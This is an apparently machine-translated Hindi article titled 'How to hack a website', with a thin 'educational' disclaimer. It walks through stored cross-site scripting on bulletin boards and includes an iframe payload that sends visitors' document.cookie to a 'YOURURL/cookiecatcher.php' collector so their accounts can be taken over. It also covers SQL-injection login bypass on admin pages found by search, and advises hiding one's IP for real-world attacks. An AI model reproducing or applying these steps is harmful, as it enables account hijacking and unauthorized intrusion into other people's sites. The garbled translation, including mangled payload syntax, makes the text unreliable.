ekterya.com

कैसे एक वेबसाइट हैक करने के लिए

टिप्पणी

: यह लेख सख्ती से, शैक्षिक उद्देश्यों के लिए बनाई गई है या तो मदद करने के लिए लोगों को एक हैकर लक्ष्य बनने के लिए कैसे या प्रदर्शित करने के लिए कैसे हैकर्स बेहतर उनकी वेबसाइटों टोपी की रक्षा के लिए काम करना चाहिए सीखते हैं। यह ट्यूटोरियल आपको कई कम सुरक्षा वेबसाइटों तक पहुंच प्राप्त करने के लिए कदम उठाएगा।

चरणों

विधि 1
क्रॉस साइट स्क्रिप्टिंग के साथ

हैक एक वेबसाइट चरण 1 शीर्षक छवि
1
एक कमजोर साइट के लिए खोजें जहां आप सामग्री पोस्ट कर सकते हैं। बुलेटिन बोर्ड एक अच्छा उदाहरण है याद रखें, यदि साइट सुरक्षित है, तो यह काम नहीं करेगा।
  • हैक एक वेबसाइट चरण 2 शीर्षक छवि
    2
    एक प्रकाशन बनाएं आपको में एक विशेष कोड दर्ज करना होगा "प्रकाशन" जो उस पर क्लिक करने वाले हर व्यक्ति के डेटा पर कब्जा करेगा।
  • यह पता लगाने की कोशिश करें कि क्या सिस्टम फ़िल्टर बाहरी कोड फ़िल्टर करता है। पोस्ट अलर्ट ("कसौटी") (को नष्ट करने "...")। यदि आप पोस्ट पर क्लिक करते समय एक चेतावनी बॉक्स दिखाई देता है, तो साइट हमलों के लिए कमजोर है
  • छवि हैक एक वेबसाइट कदम 3
    3
    बनाएँ और अपनी कुकी पकड़ने वाला अपलोड करें इस हमले का उद्देश्य उपयोगकर्ताओं की कुकीज पर कब्जा करना है, जिससे आपको असुरक्षित लॉगिन वाले वेबसाइटों पर अपने खातों तक पहुंचने की अनुमति मिलेगी। आपको एक कुकी पकड़ने की आवश्यकता होगी जो आपके लक्ष्य की कुकीज़ को कैप्चर करेगा और उन्हें रीडायरेक्ट करेंगे। धरनेवाला को उस वेबसाइट पर अपलोड करें जिसमें आपकी पहुंच है और वह PHP का समर्थन करता है बाद में हम आपको कुकी कैप्चर कोड का उदाहरण देंगे।
  • हैक एक वेबसाइट कदम शीर्षक 4 छवि
    4
    अपनी कुकी पकड़ने वाला एक प्रकाशन बनाएं कुकी को कैप्चर करने और उन्हें अपनी साइट पर भेजने के लिए प्रकाशन में एक उपयुक्त कोड दर्ज करें। हम आपको संदेह को कम करने और हटाए जाने से अपने प्रकाशन को रोकने के लिए कोड के बाद कुछ पाठ रखने की सलाह देते हैं।
  • एक उदाहरण कोड होगा: <... आइफ्रेम ... फ्रेमबार्डर = 0 ऊंचाई = 0 की चौड़ाई = 0 src = जावास्क्रिप्ट ...: शून्य (document.location ="YOURURL / cookiecatcher.php? सी ="+ document.cookie)><... / iframe> (को नष्ट करने "...")।
  • छवि हैक एक वेबसाइट कदम 5
    5
    आपके द्वारा एकत्र की जाने वाली कुकी का उपयोग करें उसके बाद, आप कुकीज़ की जानकारी का उपयोग कर सकते हैं, जो कि आपकी वेबसाइट पर आपकी आवश्यकता के उद्देश्य से पहले से ही संग्रहीत हो जाएगा।
  • विधि 2
    इंजेक्शन हमलों को निष्पादित करें

    हैक एक वेबसाइट कदम शीर्षक 6 छवि
    1
    एक कमजोर साइट के लिए खोजें आपको एक ऐसी साइट खोजनी होगी जो आसानी से एक्सेस की जा सकने वाला व्यवस्थापक लॉगिन होने से कमजोर हो। Google व्यवस्थापक login.asp को खोजने का प्रयास करें
  • हैक एक वेबसाइट कदम शीर्षक 7 छवि
    2
    व्यवस्थापक के रूप में प्रवेश करें लिखना "व्यवस्थापक" एक यूज़रनेम के रूप में और पासवर्ड के रूप में कुछ अलग-अलग वर्ण स्ट्रिंग का उपयोग करें। ये कुछ विभिन्न चेन हो सकते हैं लेकिन एक सामान्य उदाहरण 1```1 `=` 1 होगा
  • हैक एक वेबसाइट कदम शीर्षक 8 छवि



    3
    धैर्य रखें इसके लिए कई परीक्षण और त्रुटियों की आवश्यकता हो सकती है
  • छवि हैक एक वेबसाइट कदम 9
    4
    वेबसाइट पर पहुंचें अंत में, यह माना जाता है कि आपको एक थ्रेड मिलेगा जो आपको एक वेबसाइट पर प्रशासक का उपयोग करने देता है, अगर यह हमलों के लिए कमजोर है
  • विधि 3
    सफल होने के लिए तैयार

    हैक एक वेबसाइट शीर्षक शीर्षक छवि 10
    1
    एक या दो प्रोग्रामिंग भाषाएं जानें यदि आप वास्तव में वेबसाइटों को हैक करने के तरीके सीखना चाहते हैं, तो आपको यह समझने की आवश्यकता होगी कि कंप्यूटर और अन्य प्रौद्योगिकियां कैसे काम करती हैं। प्रोग्रामिंग भाषाओं जैसे कि पायथन या एसक्यूएल का इस्तेमाल करना सीखें, ताकि आप कंप्यूटर पर अधिक नियंत्रण हासिल कर सकें और सिस्टम में कमजोरियों की पहचान कर सकें।
  • हैक एक वेबसाइट शीर्षक शीर्षक छवि 11
    2
    बुनियादी HTML जानें यदि आप वेबसाइट विशेष रूप से हैक करने का इरादा रखते हैं तो आपको एचटीएमएल और जावास्क्रिप्ट की विस्तृत जानकारी भी होनी चाहिए। सीखना यह कुछ समय ले सकता है, लेकिन ऑनलाइन सीखने के कई मुक्त तरीके हैं, इसलिए यदि आप इसका लाभ लेना चाहते हैं तो आपके पास निश्चित रूप से मौका होगा।
  • छवि हैक एक वेबसाइट कदम 12
    3
    सफेद टोपी हैकर से जांचें व्हाइट टोपी हैकर हैकर्स जो अच्छे के लिए अपनी क्षमता का उपयोग करते हैं, सुरक्षा में कमजोरियों को उजागर करते हैं और इंटरनेट को हर किसी के लिए एक बेहतर स्थान बनाते हैं। यदि आप अपने कौशल को अच्छे के लिए हैक और इस्तेमाल करने के लिए सीखना पसंद करते हैं या यदि आप अपनी वेबसाइट की रक्षा करना चाहते हैं, तो हम सलाह देते हैं कि आप उनकी सलाह मांगने के लिए सफेद टोपी हैकर से संपर्क करें।
  • छवि हैक एक वेबसाइट हैक 13 कदम
    4
    विषय की जांच करें अगर आपको लगता है कि आपको हैक करना सीखना है या आप स्वयं की रक्षा करना चाहते हैं, तो आपको इसके बारे में बहुत कुछ शोध करना होगा। ऐसे कई तरीके हैं जिनमें एक वेबसाइट असुरक्षित हो सकती है और सूची लगातार बदलती रहती है, इसलिए आपको स्थायी आधार पर सीखना जारी रखना चाहिए।
  • हैक एक वेबसाइट कदम शीर्षक 14 छवि
    5
    अद्यतित रहें चूंकि संभावित हमलों की सूची निरंतर बदलती है, इसलिए आपको यह सुनिश्चित करना होगा कि आप हमेशा अद्यतित रहें। तथ्य यह है कि आप अपने आप को किसी तरह के हमले से बचा सकते हैं इसका मतलब यह नहीं है कि आप भविष्य में सुरक्षित रहेंगे!
  • युक्तियाँ

    • उपयोगी टिप्स प्राप्त करने के लिए हैकर फ़ोरम पर जाएं।

    चेतावनी

    • यदि आप वास्तविक दुनिया में हैक करने जा रहे हैं, तो ऑनलाइन उपलब्ध ऑनलाइन सॉफ़्टवेयर का उपयोग करके अपने आईपी को छिपाना।
    • हमारे लेख पढ़ना तुरंत आपको एक हैकर नहीं देगा आपको अपने कौशल और अभ्यास का निरंतर अनदेखा करना होगा।
    सामाजिक नेटवर्क पर साझा करें:

    संबद्ध
    © 2021 ekterya.com